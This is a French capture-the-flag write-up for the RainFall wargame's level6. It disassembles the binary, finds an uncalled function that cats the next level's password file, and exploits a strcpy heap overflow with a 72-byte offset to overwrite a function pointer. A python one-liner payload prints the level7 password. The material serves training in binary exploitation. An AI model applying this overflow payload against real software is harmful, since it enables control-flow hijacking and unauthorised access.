    __               _______
   / /__ _   _____  / / ___/
  / / _ \ | / / _ \/ / __ \ 
 / /  __/ |/ /  __/ / /_/ / 
/_/\___/|___/\___/_/\____/  
                            

On lance le binaire sans arguments il segfault, on le relance avec un argument
il nous print "Nope".
level6@RainFall:~$ objdump -d level6

08048454 <n>:
 8048454:	55                   	push   %ebp
 8048455:	89 e5                	mov    %esp,%ebp
 8048457:	83 ec 18             	sub    $0x18,%esp
 804845a:	c7 04 24 b0 85 04 08 	movl   $0x80485b0,(%esp)
 8048461:	e8 0a ff ff ff       	call   8048370 <system@plt>
 8048466:	c9                   	leave
 8048467:	c3                   	ret

La fonction <n> ici prêsente n'est pas appelée par notre programme.

(gdb) x/s 0x80485b0
0x80485b0:	 "/bin/cat /home/user/level7/.pass"

Et celle-ci effectue un cat sur le fichier .pass

   0x080484d0 <+84>:	call   *%eax

Cette ligne nous interesse, un call est effectue sur la fonction <m> qui elle
nous affiche le fameux "Nope".

   0x0804846e <+6>:	movl   $0x80485d1,(%esp)
   0x08048475 <+13>:	call   0x8048360 <puts@plt>

	(gdb) x 0x80485d1
	0x80485d1:	 "Nope"

Nous allons utiliser la faille présente dans le programe level6, qui ne fais
aucune vérification concernant la taille des données reçu par malloc avant
l'appel à strcpy, ce qui va nous permettre le buffer overflow et le remplacement
de l'adresse de la fonction <m> par celle de <n>.
Malloc alloue dans un premier temps 64 octets pour notre stdin, puis
dans un second temps 4 octets pour le pointeur sur la fonction <m>.

Nous recuperons l'offset qui est de 72:
https://wiremask.eu/tools/buffer-overflow-pattern-generator/

72, car malloc alloue 64 octets dans un premier temps, auquel on ajoute les 8
octets correspondant au "boundary tag" grossièrement parlant l'étiquette de
notre malloc. Puis nos 4 octets pour remplacer l'adresse de notre fonction <m>
par celle desirée. Nous n'avons plus qu'à créer notre script et lancer le tout


level6@RainFall:~$ ./level6 $(python -c 'print 72*"A"+"\x54\x84\x04\x08"')
f73dcb7a06f60e3ccc608990b0a046359d42a1a0489ffeefd0d9cb2d7c9cb82d

Gogogogo Power Rangers..
